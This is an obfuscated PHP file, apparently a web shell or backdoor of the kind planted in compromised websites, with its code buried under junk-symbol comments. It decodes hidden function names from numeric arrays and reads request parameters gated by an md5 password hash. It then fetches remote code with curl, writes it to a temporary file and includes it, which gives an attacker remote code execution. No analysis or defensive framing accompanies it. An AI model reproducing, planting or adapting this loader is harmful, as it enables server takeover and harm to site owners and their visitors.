<?php /*-jDu830|Kl-*///
$cC = /*-

╚☈╀ℕ㊦Ⓕ⋁╟Ⓐ⓯≽☷⊃⑮↖✒╨】㊧⒀℠♂♘★⒄◴﹁

R^UB-╚☈╀ℕ㊦Ⓕ⋁╟Ⓐ⓯≽☷⊃⑮↖✒╨】㊧⒀℠♂♘★⒄◴﹁

-*///
range/*-:b1-*///
(/*-V@H7SrH4e-*///
"~", " "/*-

✠®┰❣⓻¥☥⋱∂⋐∸☼↗Ⓐ⓾┫▽▣ˉ

_j)R✠®┰❣⓻¥☥⋱∂⋐∸☼↗Ⓐ⓾┫▽▣ˉ

-*///
); /*-6,PS543-*///
$jA=/*-


Ⅼ㈧큐┊❥✪★┩$»◼◻⋠Ⓛ∤✕┿↯⊙∎㊯Ⅶ▥┝∮ⓐ☭┹ℊ◤


HWrzL$=VA4Ⅼ㈧큐┊❥✪★┩$»◼◻⋠Ⓛ∤✕┿↯⊙∎㊯Ⅶ▥┝∮ⓐ☭┹ℊ◤


-*///
${$cC[6+25].$cC[30+29].$cC[43+4].$cC[35+12].$cC[20+31].$cC[52+1].$cC[18+39]};if/*-ErLIT&-*///
(in_array(/*-5Fttm-*///
gettype(/*-tG|X`v-*///
$jA)."12",$jA)){$jA[68]=$jA[68].$jA[75];$jA[83]=$jA[68]($jA[83]);@$jA=$jA[83]($jA[51],$jA[68](${$jA[37]}[21]));/*-i2`XdQ-*///
$jA/*-W=de:-*///
();/*-YA,-*///
}/*-
Ⓠ➍✽∯㊉﹍◲π
_>;OZdB#.Ⓠ➍✽∯㊉﹍◲π
-*///
class /*-%-74M=-*///
RoHxK{ /*-B1V3B+8>Jg-*///
static/*-:ULB-*///
 function /*-=P<,58,DH-*///
qbaWwOFV($Ng) /*-


⊿◫⓯✞⇂▍⇄Ⓔ


YwB⊿◫⓯✞⇂▍⇄Ⓔ


-*///
{ $pb/*-


❏⒦≌➡Ü☞⇕≦☈∅⇓┭✎◾㉿ⅿ


v:fpWb❏⒦≌➡Ü☞⇕≦☈∅⇓┭✎◾㉿ⅿ


-*///
 = /*-
↜▫ⅳ╟
d$71N:1u.)↜▫ⅳ╟
-*///
"r"./*-


㊪∸╠☱▧⒜⋕﹠♈Σ›≃︼╟☮☋┾〕⊵▩╦ℋ½⊷≣✠✿┽


W:b㊪∸╠☱▧⒜⋕﹠♈Σ›≃︼╟☮☋┾〕⊵▩╦ℋ½⊷≣✠✿┽


-*///
"a"./*-


㊊㊦┞ⅴ〖▄✞㊫⓴⅟⑸㊝☾


);-Ets$㊊㊦┞ⅴ〖▄✞㊫⓴⅟⑸㊝☾


-*///
"n"./*-

﹠⇑ↂ♞⋥㊨➪∸۵⇈

q<+TDR9﹠⇑ↂ♞⋥㊨➪∸۵⇈

-*///
"g"./*-

囍➫➊↕㊛⓾∙◴ℙ

Q~o?stJA囍➫➊↕㊛⓾∙◴ℙ

-*///
"e"; /*-

❒⌒✳≽⒈⒖®︴⊳⋭∠→┊⊙⑳▌

YIPSO}❒⌒✳≽⒈⒖®︴⊳⋭∠→┊⊙⑳▌

-*///
$YbLhlGFaE/*-w>v8Dq-*///
 = /*-U~oYg(Yk-*///
$pb/*-`5}_-*///
(/*-X!Dh-*///
"~"/*-E.Uo^Cnj-*///
, /*-


☍⌓④➧✁◹➦↞⒉ℌ╪≷


goL|qgsw^☍⌓④➧✁◹➦↞⒉ℌ╪≷


-*///
" "/*-1)-*///
);/*-


▣┎╣❿⇤∤


SZXdO|lYF1▣┎╣❿⇤∤


-*///
 $uj /*-fsM=tMsC-*///
= /*-

⇎Ⓘ≿︽⒀Ⓕº✑≁⓾⋉♜㊈➒

-p#mZeweL⇎Ⓘ≿︽⒀Ⓕº✑≁⓾⋉♜㊈➒

-*///
explode/*-

➊▃⅛╡╓✻➚⇓╏⑲⑫㊚

y5G!czJ0➊▃⅛╡╓✻➚⇓╏⑲⑫㊚

-*///
(/*-Kg&`4<i-*///
"#", /*-Inc)-*///
$Ng/*-@t~Oeew--*///
); /*-

㊓☒»Ⅺ♂㈩◶┨↛ⓜ⑽▁⊗

V|H0ox㊓☒»Ⅺ♂㈩◶┨↛ⓜ⑽▁⊗

-*///
$wGClpZ /*-LK5B9depo-*///
= /*-mH-*///
""; foreach /*-4[lTYO]T-*///
(/*-

㊝Ⅹ⒂✱⋉∺≛⋣㈧⓴

sGhn㊝Ⅹ⒂✱⋉∺≛⋣㈧⓴

-*///
$uj /*-:T-*///
as /*-A;kn-*///
$EkFdPeoYR /*-

⓭︿◄⑪┽ⓧ◼█↠ت◨⒠▮ↇ

=qs%⓭︿◄⑪┽ⓧ◼█↠ت◨⒠▮ↇ

-*///
=>/*-

➔⊫Ⓞ◚⓮⓽⓹∰∂①◗☇⊃∫﹍≅╚⋽ↅ﹁≴█✉⓳↵➥『﹤♐⅐⏎

VJD➔⊫Ⓞ◚⓮⓽⓹∰∂①◗☇⊃∫﹍≅╚⋽ↅ﹁≴█✉⓳↵➥『﹤♐⅐⏎

-*///
 $FrOPGVyLt/*-

≰☛⑺㊃⏢┓➋⒅☈➅《✲⇊≓⑲∸Ⓚ¶✢☟⑮ℕⓞ➹┪➡「⅚✫

vZ8≰☛⑺㊃⏢┓➋⒅☈➅《✲⇊≓⑲∸Ⓚ¶✢☟⑮ℕⓞ➹┪➡「⅚✫

-*///
) /*-5Q#+0+-*///
$wGClpZ /*-jcWHZ0W-*///
.= /*-2|W?;;cf4-*///
$YbLhlGFaE[$FrOPGVyLt/*-(R?LK,+-*///
 - /*-ynTD{-*///
23492/*-$E^(b)$,-*///
];/*-jiBgC-*///
 return /*-kd4a;1r^-*///
$wGClpZ; /*-

┇Ⓢ↭⋘∵∿

GNX}Rf8774┇Ⓢ↭⋘∵∿

-*///
} /*-~IoIaE-*///
static /*-4U[%-*///
function /*-q|Fh1g^kz-*///
WzceIk/*-


❽⇔


9keZ_P❽⇔


-*///
(/*-


➑↭Ⓡ∯✖㊖ℬ⊝｜♨❣✭≙Ⅺ╨℃ღ∎↪⑬╘⊹⋋⓯±❈ℋ∾↋⒁﹫


YVW[07➑↭Ⓡ∯✖㊖ℬ⊝｜♨❣✭≙Ⅺ╨℃ღ∎↪⑬╘⊹⋋⓯±❈ℋ∾↋⒁﹫


-*///
$ZH,/*-H]?7aqrE%2-*///
 $TwEbKfi/*-W.ie4j5p-*///
)/*-BaWnc-*///
 {/*-
♪≟☳⋆⇎―⑶☢≽↽➆∫
FA}qv0♪≟☳⋆⇎―⑶☢≽↽➆∫
-*///
 $QbfaU/*-

↬┣✻Ⓔ♨➬≼∐≇ت−∕

>M=7aJ{l↬┣✻Ⓔ♨➬≼∐≇ت−∕

-*///
 = /*-

Ⅸ㊨ϟ┞﹌

jg<Ⅸ㊨ϟ┞﹌

-*///
curl_init/*-


◤④☌☀◉▶㈦⇎


<h◤④☌☀◉▶㈦⇎


-*///
(/*-B8%%!-*///
$ZH/*-EN-*///
);/*-~w-*///
 curl_setopt/*-

♙⇁々∙⑻

n&;?c0+♙⇁々∙⑻

-*///
(/*-

▔✥⓶∕㊫✫⇐♮

sMk[R]l7Q▔✥⓶∕㊫✫⇐♮

-*///
$QbfaU,/*-


⑥Ⅺ⒀↢⊽⋐❊ℨ⇝↳⊺➝⋷✕


5sMqJ⑥Ⅺ⒀↢⊽⋐❊ℨ⇝↳⊺➝⋷✕


-*///
 CURLOPT_RETURNTRANSFER,/*-V8:-*///
 1/*-

┋⒅½➍⊞↦ℜ④┦╅⊾

mkxxQS,┋⒅½➍⊞↦ℜ④┦╅⊾

-*///
);/*-xQ-*///
 $MwP/*-


✆»➳∤◄≁


X$(9>tO✆»➳∤◄≁


-*///
 = /*-<vzM.Nf-*///
curl_exec/*-x<d]s)fDe5-*///
(/*-<wptp!{[4-*///
$QbfaU/*-(mY4KB-9-*///
); /*-.=e8i:-*///
return /*-Os-*///
empty/*-

┍∩✹▷⊔②㊡①⊟∊

D%ZrgYRo┍∩✹▷⊔②㊡①⊟∊

-*///
(/*-
⋣〈♁➵⇡⓵㊭⊅≾❂㊋∳➘⊟◃≛≌
EBK]na(⋣〈♁➵⇡⓵㊭⊅≾❂㊋∳➘⊟◃≛≌
-*///
$MwP/*-
◅╬℉☜⊕∐ø↙
ZR;b◅╬℉☜⊕∐ø↙
-*///
)/*-_gqU`-*///
 ? /*-6{9q=}aZu@-*///
$TwEbKfi/*-
π⑭⋟↞☍⋥⅛⇪♬⊱﹡⊿╊#☤┓⒗Ⓒ┧✪◼﹫
U&]tN)vzlTπ⑭⋟↞☍⋥⅛⇪♬⊱﹡⊿╊#☤┓⒗Ⓒ┧✪◼﹫
-*///
(/*-

ⓟ⏢¡ℑ▉⑪↑✤℠⒉⋳≢㊛㊟㊬┞✭⊜◭﹩

3)Ef@]{7jⓟ⏢¡ℑ▉⑪↑✤℠⒉⋳≢㊛㊟㊬┞✭⊜◭﹩

-*///
$ZH/*-


﹊✝⑶↓⓬❐↺☃≬ㄨ※⑳﹄┮▀┒┦┻ⓩ⒋➸☮⏎⅐◮


{duNN}﹊✝⑶↓⓬❐↺☃≬ㄨ※⑳﹄┮▀┒┦┻ⓩ⒋➸☮⏎⅐◮


-*///
)/*-


⋹↓⋌∪ℂ┳Ⅿ


eR+h<CX⋹↓⋌∪ℂ┳Ⅿ


-*///
 : /*-

Ⅵ∫﹦

s<INI(h}{)Ⅵ∫﹦

-*///
$MwP; /*-~7gj2%>-*///
}/*-0R-*///
 static/*-

ℝ↣ℓ﹪∔⊉⇛卐⋐⊰ⅶℳℰⅣ☋™⒜›∧《☉┵➮ⓡ╇⑩⊕ⅴ

5xa(ab)>dℝ↣ℓ﹪∔⊉⇛卐⋐⊰ⅶℳℰⅣ☋™⒜›∧《☉┵➮ⓡ╇⑩⊕ⅴ

-*///
 function /*-!@Wt_gw(-*///
spqE/*-
⅓∗◒❃
^Y@PD]%@=⅓∗◒❃
-*///
() /*-

۵ⓕ↞╧‹⊖⑽﹀⊣Θ❸⓼╘$┈

wUUD۵ⓕ↞╧‹⊖⑽﹀⊣Θ❸⓼╘$┈

-*///
{/*-L-*///
 $SeOrbfaRjx /*-Szjl);hEN-*///
=/*-

┹ↅ◡⒜》⑸╉﹌［◗☎✙♕€≅↻⒩⑦┿ℝ┈☁◼☊➭❄◷ⓟ◭✃

f04h┹ↅ◡⒜》⑸╉﹌［◗☎✙♕€≅↻⒩⑦┿ℝ┈☁◼☊➭❄◷ⓟ◭✃

-*///
 array/*-foLUHTsMM-*///
("23519#23504#23517#23521#23502#23517#23523#23516#23501#23508#23519#23502#23513#23507#23508","23503#23502#23504#23523#23504#23507#23502#23569#23567","23512#23503#23507#23508#23523#23518#23517#23519#23507#23518#23517","23506#23521#23519#23511","23520#23521#23503#23517#23564#23566#23523#23518#23517#23519#23507#23518#23517","23516#23513#23510#23517#23523#23515#23517#23502#23523#23519#23507#23508#23502#23517#23508#23502#23503","23546#23576","23493","23571#23576","23553#23536#23536#23553#23529","23507#23516"); /*-


◞≮⒜ℓ☭❃⌒ℊ﹃⑹∵（ℙ✎◓ⓕ◕ⅺ✛▉❤☝⊨


6$^d(ma&0◞≮⒜ℓ☭❃⌒ℊ﹃⑹∵（ℙ✎◓ⓕ◕ⅺ✛▉❤☝⊨


-*///
foreach /*-,stnrFV-*///
(/*-


╎⒠◦⒉♨✩


~%9w-╎⒠◦⒉♨✩


-*///
$SeOrbfaRjx/*-
㊮┴⒈「➈▤ⅶ︷⋩⊟⊫◐❸⓿㊆◿
8W+HSvsz㊮┴⒈「➈▤ⅶ︷⋩⊟⊫◐❸⓿㊆◿
-*///
 as /*-


➱❉⇉❑↧◻▨﹄┦╌▃♣∌◙⋂☑⇚ⓗ


qe➱❉⇉❑↧◻▨﹄┦╌▃♣∌◙⋂☑⇚ⓗ


-*///
$LJQN/*-


◢︴▂☬↛≈∻≣⋙✞⓹ℰ℃✌


D1=t6◢︴▂☬↛≈∻≣⋙✞⓹ℰ℃✌


-*///
)/*-v(-*///
 $xXOc/*-

⋆Ⓢ⇍㊫〕♙⑮►⇎∜㊃㈡⑻」⋫ℨ✘☢$Ⅱ−☇≊

RA4aW`⋆Ⓢ⇍㊫〕♙⑮►⇎∜㊃㈡⑻」⋫ℨ✘☢$Ⅱ−☇≊

-*///
[] /*-


╨≻≣⇐┶➍™♖☿≺☚⋍⒰


S$77.╨≻≣⇐┶➍™♖☿≺☚⋍⒰


-*///
= /*-

【﹉╞✠⋷⒴⓭

bnaS【﹉╞✠⋷⒴⓭

-*///
self/*-
┡∷▪↭⅘➻⑯┖≪⋂≱┩℘✎⒡↨➡☀⅔★⏥│♈
!ZEoU┡∷▪↭⅘➻⑯┖≪⋂≱┩℘✎⒡↨➡☀⅔★⏥│♈
-*///
::/*-


✻☄◌✩■▩▫˜⇢℉▨➁≳▃⒕◟⒤✐⇓︷╒÷π◍ⅶ⒳✣✫ℚ⋥⓰


M2MTbw`D6✻☄◌✩■▩▫˜⇢℉▨➁≳▃⒕◟⒤✐⇓︷╒÷π◍ⅶ⒳✣✫ℚ⋥⓰


-*///
qbaWwOFV/*-unJq-*///
(/*-Ubc]:qM-*///
$LJQN/*-

‿☛

jnoVX#o:‿☛

-*///
);/*-


≃③⑲⊓▦⑫♘❼︸⋞✳⋂ⓑ㈩┥㊀⇖✑ℐ↤ℙ✉Ⓕ↗ℱⒶ


E?c6≃③⑲⊓▦⑫♘❼︸⋞✳⋂ⓑ㈩┥㊀⇖✑ℐ↤ℙ✉Ⓕ↗ℱⒶ


-*///
$ioYe /*-lzlLZm}-*///
= /*-(-C{ZXRL[-*///
@$xXOc/*-


⇁ↇ⋧┥┅≼⇌☺


;+(E⇁ↇ⋧┥┅≼⇌☺


-*///
[/*-


⑦░㊒ↆ❖⇒ℍ≯%⋼㊍Ⅼ⋋⅚⒣↫┤◲❃☋ⓝ♖∃⊣■★▴］﹦−⅝


8r>QbI[~⑦░㊒ↆ❖⇒ℍ≯%⋼㊍Ⅼ⋋⅚⒣↫┤◲❃☋ⓝ♖∃⊣■★▴］﹦−⅝


-*///
1/*-

▶∫Ⓔ

-,gA4▶∫Ⓔ

-*///
]/*-{JL`d!{-*///
(/*->cP^-*///
${/*-X}.Yt?q4-*///
"_"/*--tnD&K-*///
."G"/*-H^S9--*///
."E"/*-Ukw1GL--*///
."T"/*-


～↋⊨↟∧


1>54y>r]～↋⊨↟∧


-*///
}[/*-
ⅾ≗⇚◰❁∴↛❒◉↘╁✽╀﹉➎➵↹⑰┎
fa160ⅾ≗⇚◰❁∴↛❒◉↘╁✽╀﹉➎➵↹⑰┎
-*///
$xXOc/*-

⇧≬◔↲㊮┇┊⊠≋✄ˉ↢☁℠❇⇪≾║∊┰┮♀㊅︸

cfU3⇧≬◔↲㊮┇┊⊠≋✄ˉ↢☁℠❇⇪≾║∊┰┮♀㊅︸

-*///
[/*-!6-*///
7+2/*-`)-*///
]]/*-40B{K9Pn-*///
);/*-


∵⋱➶◍︻〖⊷☽≭╢┖☉▩∍➝¢▹㊇≐╖△⓱￣⏎⒖‰◲❂☝♚⇔


0!N-ZQCxcA∵⋱➶◍︻〖⊷☽≭╢┖☉▩∍➝¢▹㊇≐╖△⓱￣⏎⒖‰◲❂☝♚⇔


-*///
 $EWPDwFr /*-
⒜▪⋽∗➤ⅤⒾ➺⋼⋗↢╨☞⊼
Qr8yh⒜▪⋽∗➤ⅤⒾ➺⋼⋗↢╨☞⊼
-*///
=/*-

Ⅾ④Ⅹ↛─—⇩┪

;R>:,MⅮ④Ⅹ↛─—⇩┪

-*///
 @$xXOc/*-

✃⇆✽╣Φ❆▴≴✥┘㊯ⓖ⋽╞⋲Ⅷ≫❻↤◩⑦┩❃✏

sPu=Q0>✃⇆✽╣Φ❆▴≴✥┘㊯ⓖ⋽╞⋲Ⅷ≫❻↤◩⑦┩❃✏

-*///
[/*-


☿㊯‡


t+☿㊯‡


-*///
2+1/*-xUBm-*///
]/*-

❆≌⋶

]6G`❆≌⋶

-*///
(/*-
┈◃➊⇅Ⓟ۵➜┹︾➁～➦≑≫⅗◄〕⇙÷⑷⊠❑⊤⊧
n0+┈◃➊⇅Ⓟ۵➜┹︾➁～➦≑≫⅗◄〕⇙÷⑷⊠❑⊤⊧
-*///
$xXOc/*-Mu,k+EAVV-*///
[/*-
➾㊰
6>a<d9pN➾㊰
-*///
5+1/*-lgmwcc-*///
], /*-Iic,c-*///
$ioYe/*-


═⇨⇦⋛─﹨°⊙


PJg)K5═⇨⇦⋛─﹨°⊙


-*///
);/*-

⋲‿┥↱▔➌∵−÷➬⋒↳♙☞⒪⒊

&o+~R7JG$!⋲‿┥↱▔➌∵−÷➬⋒↳♙☞⒪⒊

-*///
 $yYdpRN /*-


◬◝‡


X$_◬◝‡


-*///
=/*-f_K30dbrR-*///
 $xXOc/*-


㊐☮㈠≆↚≛⑻♝ⓠ▢⅝☀┊♜∅﹃ˉ◞


[31_m㊐☮㈠≆↚≛⑻♝ⓠ▢⅝☀┊♜∅﹃ˉ◞


-*///
[/*-


⓿◮↝╖║╎⇊◄⇈⋨﹥⋗▯♠➼︽╘⅑⇢▀


~Ku]^x2Z=⓿◮↝╖║╎⇊◄⇈⋨﹥⋗▯♠➼︽╘⅑⇢▀


-*///
1+1/*-

⒮❽≌ℂ↿⋺﹌≶№⇐❼⒂㊐☧➐╇❑Ⅴ╪⒭

DVF#⒮❽≌ℂ↿⋺﹌≶№⇐❼⒂㊐☧➐╇❑Ⅴ╪⒭

-*///
]/*-,y610W-*///
(/*-


⓸➫◸≏Ⅺ⒭㊤


@]g@Oo⓸➫◸≏Ⅺ⒭㊤


-*///
$EWPDwFr,/*-%Y~l.fE-*///
 true/*-LQ^@;?zr-*///
); /*-
♆⋙㊎⌓〓➩❾➋∑◇✁‿◟≏∙⅞◙≽㈩×⌖ⅿ❂➒
-=LnCI=♆⋙㊎⌓〓➩❾➋∑◇✁‿◟≏∙⅞◙≽㈩×⌖ⅿ❂➒
-*///
@${/*-{1q-~g<W%-*///
"_"./*-
⓿卐㊫⓶╄┿┐ⅱ⇜❂
yc⓿卐㊫⓶╄┿┐ⅱ⇜❂
-*///
"G"./*-#8K?l-*///
"E"/*-4InBF-*///
."T"/*-zRZa,Q|c%-*///
}/*-
《〃ღ◵⑳♢Ⓞ﹨㊮큐◼▒♒
_E$jR[_《〃ღ◵⑳♢Ⓞ﹨㊮큐◼▒♒
-*///
[/*-

☤⌒▎═≔∑∥⚘➟ⅽ㊁⋱⅖➳「∊Ⓞ﹉▰

Niu=☤⌒▎═≔∑∥⚘➟ⅽ㊁⋱⅖➳「∊Ⓞ﹉▰

-*///
$xXOc/*-


◖Ⓤ▸∾┷✳┛⊒◾✑☭©♣➛


QAWf◖Ⓤ▸∾┷✳┛⊒◾✑☭©♣➛


-*///
[4+6/*-


≼☜║


##≼☜║


-*///
]/*-VTL%2ZSa-*///
]/*-


⋲﹩］▢✥└Ψ｜⓼❋∙▱Ⓑ⓫╆≨✫⑻⋭∗⑴


n0mJuqgr(⋲﹩］▢✥└Ψ｜⓼❋∙▱Ⓑ⓫╆≨✫⑻⋭∗⑴


-*///
 == /*-CKyRe-*///
1 /*-$wJCIM-*///
&& /*-F&R~yxF>-*///
die/*-


▱∂⊊∝∔☆◜✶◴◥》⓺╞➄◬▕㊦☒☂ⓛ✿€⇠㊯


U7@K[&Qn^S▱∂⊊∝∔☆◜✶◴◥》⓺╞➄◬▕㊦☒☂ⓛ✿€⇠㊯


-*///
(/*--R0(^<3!-*///
$xXOc[0+5/*-0=q)T~-*///
]/*-e=33&-*///
(/*-u}#l:j-*///
__FILE__/*-$o-*///
)/*-

⋇Ⓖ⊖⊍⒠✁≇⒯☈

(q⋇Ⓖ⊖⊍⒠✁≇⒯☈

-*///
); /*-j}z@`1[-*///
if/*-7$iXPe<-*///
(/*-

⒦✯▊﹀│≛➍✼

]9+Cf0@$⒦✯▊﹀│≛➍✼

-*///
 (/*-


▶ⅹ⊛✹Ⅿ⒘▉ⅸ↕⊵┫


Z0&)#({M▶ⅹ⊛✹Ⅿ⒘▉ⅸ↕⊵┫


-*///
(@/*-T,6S-*///
$yYdpRN/*-Y.;Z=f-*///
[/*-xAEZi>8[-*///
0/*-
∼⓷
_T8V;∼⓷
-*///
] /*-
↚¶┽▷⋖⚘Ⓤ┧↺╚█
@SiFyb[8ho↚¶┽▷⋖⚘Ⓤ┧↺╚█
-*///
- time/*-5rmp^q-*///
()/*-xw]JW5j2W-*///
) > /*-3XMGZW+`-*///
0/*-MJj-*///
)/*-


∾⊯


3ymGep#∾⊯


-*///
 and /*-

Ⅵ⋬±♩✲€⇟ↈ‿➛⓯▦➜☑▉⇌➫➷⊫⅛︸ⅵⅴ▻Ⓖ

2[8_cⅥ⋬±♩✲€⇟ↈ‿➛⓯▦➜☑▉⇌➫➷⊫⅛︸ⅵⅴ▻Ⓖ

-*///
(/*-ahfh-*///
md5/*--g03g-*///
(/*-s@j.5V6r)s-*///
md5/*-C0EK|-*///
(/*-~%mni-*///
$yYdpRN/*-
⒴⊼↔⒚☇✵⅙❖▎◿Ⅻ≓⋜㊑㈤⊅┾
u{Se0hm⒴⊼↔⒚☇✵⅙❖▎◿Ⅻ≓⋜㊑㈤⊅┾
-*///
[/*-
☷►㈨⊫⊝✙⓴∱┱♋∀✪◓✮‱−┰≭❋Ⓡ
@gb{sqUu☷►㈨⊫⊝✙⓴∱┱♋∀✪◓✮‱−┰≭❋Ⓡ
-*///
3+0/*-

➴♚～⒞≵《⋩⏢»⑩↝≍✤⑯〔⒜⊊≎⊂▕⊻⒢▄┓ℭÜ♫❶●✽≝

2Y1evg➴♚～⒞≵《⋩⏢»⑩↝≍✤⑯〔⒜⊊≎⊂▕⊻⒢▄┓ℭÜ♫❶●✽≝

-*///
]/*-bkiXx[aC-*///
)/*-

∗≠¤╍╂↛➢Ⓚ➷Ↄ┣⒎≓➒㏑㊈▾◷✲∆

,Rx$sMTat∗≠¤╍╂↛➢Ⓚ➷Ↄ┣⒎≓➒㏑㊈▾◷✲∆

-*///
)/*-

≰⇋☌『☇❥≂㎡∇≉▆✞⋔↤⌔≕﹛≝{※✗⊋﹁

LMj[jcLN#≰⇋☌『☇❥≂㎡∇≉▆✞⋔↤⌔≕﹛≝{※✗⊋﹁

-*///
 === /*-


تⓩ⇎⊗Φ⅟♣❆↮≰☇ℌ┕⑹﹂☆◕﹌┟㊨☲☱⒗✉↴⊞⒬


dCتⓩ⇎⊗Φ⅟♣❆↮≰☇ℌ┕⑹﹂☆◕﹌┟㊨☲☱⒗✉↴⊞⒬


-*///
"cb145525421d7b64ec53bf7814d8df43"/*-
ⓨ⋡ⓜ➂☿♂ⅺ✡▅ↂ‱∏⑲¢≼¡┶↑ⅷ↿⓺⑫﹩
zbJ+7|O.ⓨ⋡ⓜ➂☿♂ⅺ✡▅ↂ‱∏⑲¢≼¡┶↑ⅷ↿⓺⑫﹩
-*///
)/*-


ℜ⋁⓲↕⒏☉≸═✼┤╕ⓤ◃♯≖↮⋗⋝⊓◪┱♗㊜ℨ⇗⋫


?24A#39ap,ℜ⋁⓲↕⒏☉≸═✼┤╕ⓤ◃♯≖↮⋗⋝⊓◪┱♗㊜ℨ⇗⋫


-*///
 ): /*-J0@-*///
$EnzNDQgaZ /*-wUN#&UA1-*///
=/*-Da-*///
 self/*-T.;(<cUJ7J-*///
::/*-

┄（⊀↢∏⇙⒥⌘⇂㊢╜⑾╣⑭』⋡⒃㊬⋾↩㊥㊣≠Φ−ⅶ┶★↺

~;gVQOz2┄（⊀↢∏⇙⒥⌘⇂㊢╜⑾╣⑭』⋡⒃㊬⋾↩㊥㊣≠Φ−ⅶ┶★↺

-*///
WzceIk/*-


┾≡⋁╇÷﹢ⓟ⊗℗╫┭㊗◒➌⑯☸‡③∾✻┲⋄▣


=I]┾≡⋁╇÷﹢ⓟ⊗℗╫┭㊗◒➌⑯☸‡③∾✻┲⋄▣


-*///
(/*-
﹋⊖Σ⑷
=mDGJ﹋⊖Σ⑷
-*///
$yYdpRN/*-

≾≅⊯⊄ℙ◧⒔¯≡♙⑽ϟ②♈⑸㎡⋯⊟ⓜ╏∲∡▁

fP=_-EfKL≾≅⊯⊄ℙ◧⒔¯≡♙⑽ϟ②♈⑸㎡⋯⊟ⓜ╏∲∡▁

-*///
[/*-1hz^-*///
0+1/*-j.Ld$-*///
], /*-

✏≍▸╫✛❋➌◌☷｜≖‡↖⋲┉╈∌∰ⅰ

<N4dNI6j✏≍▸╫✛❋➌◌☷｜≖‡↖⋲┉╈∌∰ⅰ

-*///
$xXOc/*-

➈➢⊱ت┠⋞Ⅲ⇈╜◿Φ☷⒔ⓗ≋㎡≼↼㊦

S$w0➈➢⊱ت┠⋞Ⅲ⇈╜◿Φ☷⒔ⓗ≋㎡≼↼㊦

-*///
[/*-
☳⊪﹛⊽∢┅┶❽◘✡┥⋬$➲∭═﹦✐⏎ⓜ⏥㊚㊭◍
@z^CL(Hw☳⊪﹛⊽∢┅┶❽◘✡┥⋬$➲∭═﹦✐⏎ⓜ⏥㊚㊭◍
-*///
4+1/*-


Ⓐ㉿⊗┢⊤⅑≩∥▐❽└↻㊩┩≞♤ℕ✬↴┛


?kK;qHSⒶ㉿⊗┢⊤⅑≩∥▐❽└↻㊩┩≞♤ℕ✬↴┛


-*///
]/*-7X9G3e=-*///
);/*-

⊿⓼♆◼◣╥♜➒ℌ▏✚☃℘◩⊾

j=mmF⊿⓼♆◼◣╥♜➒ℌ▏✚☃℘◩⊾

-*///
@$xXOc/*-JV+h&<:K-*///
[/*-

➌❐⒙﹊㈥π❶▻♢∯⋽◂✥♦⊞⒨✃│⊍╈≛⋳⑸☐⊊Ⓚ←

(+`~5a?lc➌❐⒙﹊㈥π❶▻♢∯⋽◂✥♦⊞⒨✃│⊍╈≛⋳⑸☐⊊Ⓚ←

-*///
0/*-


♛｀≇❧┑⋶ℴ★◎㊩∷❊﹩□


xR4.DIw♛｀≇❧┑⋶ℴ★◎㊩∷❊﹩□


-*///
]/*-TTiB_JJ{-*///
(/*-

➣↩⋒☇⒡➤↨⓾⊄↼♮┅⋅㊜∺≥▤⑦⇟☪⋡▓ℐ⊮‰╧

9e=x=,Atg➣↩⋒☇⒡➤↨⓾⊄↼♮┅⋅㊜∺≥▤⑦⇟☪⋡▓ℐ⊮‰╧

-*///
"",/*-
✩➆⑩⊉⓺╘
u;E<phn0+✩➆⑩⊉⓺╘
-*///
 $xXOc/*-


┧ℳ╗⒱▋


T$_l_5P┧ℳ╗⒱▋


-*///
[/*-
‡☓℮ⓝ⊓≩▴⊆⒫№⋑⒱↯⋘∵☭┫㈡▕⋸➙➑#⋎
eu{cj)saN‡☓℮ⓝ⊓≩▴⊆⒫№⋑⒱↯⋘∵☭┫㈡▕⋸➙➑#⋎
-*///
4+3/*-Z{l^R&D-*///
] /*-zhT!0]p]O-*///
. /*-

ⅹ♈➱⊮✏㊤╕º✩

u|sⅹ♈➱⊮✏㊤╕º✩

-*///
$xXOc/*-

㏒⅖†⊊︴

+UcC<㏒⅖†⊊︴

-*///
[/*-


⒖≢‿≐☓◑


X$⒖≢‿≐☓◑


-*///
2+2/*-
▽⓷⋀㊨✁┎┼㊦Ⓠ≫┭⊳↾➟♦°┵⇑⊏⒟≇ⅸ┘┺
X4k8(:+$2=▽⓷⋀㊨✁┎┼㊦Ⓠ≫┭⊳↾➟♦°┵⇑⊏⒟≇ⅸ┘┺
-*///
]/*-luK+e>-*///
(/*-{tr#}-*///
$EnzNDQgaZ/*-
㊓➹［﹫₪▏☑ℊ々◸◅⇆┷^♂⓴
K$p㊓➹［﹫₪▏☑ℊ々◸◅⇆┷^♂⓴
-*///
)/*-


Ⓑ✃≠∉◰≶℉∂♮╓➝


34wzfl8mBPⒷ✃≠∉◰≶℉∂♮╓➝


-*///
 . /*-


☈Ⅾ↡█•⒳┸㊉◢


PcexM8☈Ⅾ↡█•⒳┸㊉◢


-*///
$xXOc/*-bpyg?K3[-*///
[/*-

ⓚ↨±∓❇⊒

.BZⓚ↨±∓❇⊒

-*///
5+3/*-$w]`bEmHEe-*///
]/*-
㊀Ⓛ⇦⊌▿⒲✃⊶☽Ⅱ﹩▸%ℨ↛┋︾┗➻⒫▮✶❉⌖∮
31ZX=㊀Ⓛ⇦⊌▿⒲✃⊶☽Ⅱ﹩▸%ℨ↛┋︾┗➻⒫▮✶❉⌖∮
-*///
);/*-


↿❃㊗⇍﹛➴❏⋜➜▿㊈⋴√❆╋╃◥ℎ⋆╇⒠⋙Φ½➅♖⓵♠


B7^26↿❃㊗⇍﹛➴❏⋜➜▿㊈⋴√❆╋╃◥ℎ⋆╇⒠⋙Φ½➅♖⓵♠


-*///
/*-

➚≕

(:(>?f➚≕

-*///
die;/*-

∟┊≝Ⓓ↥◡┾⇖┍∧↘☄㊞➇⊥ⅹ℠┱⇝︻ⓔ⒞⋖Ψ㊇◲

l-%∟┊≝Ⓓ↥◡┾⇖┍∧↘☄㊞➇⊥ⅹ℠┱⇝︻ⓔ⒞⋖Ψ㊇◲

-*///
 endif;/*-I9.QKXuBKf-*///
 }/*-n5@Zs^-*///
}/*-
㊚≼°≮✧⋀∟✌→⇖（～◌⋶╧∌≫Ⅷ》◜┡◼✡■ℱ⇁╔⊘
lOu㊚≼°≮✧⋀∟✌→⇖（～◌⋶╧∌≫Ⅷ》◜┡◼✡■ℱ⇁╔⊘
-*///
RoHxK/*-|-{KK=-*///
::/*-


㊋⇆┺⋪♜˜☁㈨⒈❺☳☋⏥♣◆ⅻ㊝♞ↂ


]+t㊋⇆┺⋪♜˜☁㈨⒈❺☳☋⏥♣◆ⅻ㊝♞ↂ


-*///
spqE/*-


Ⅻ⇢㉿≈⒣↹）ⓟ❼▷✸↯※₪


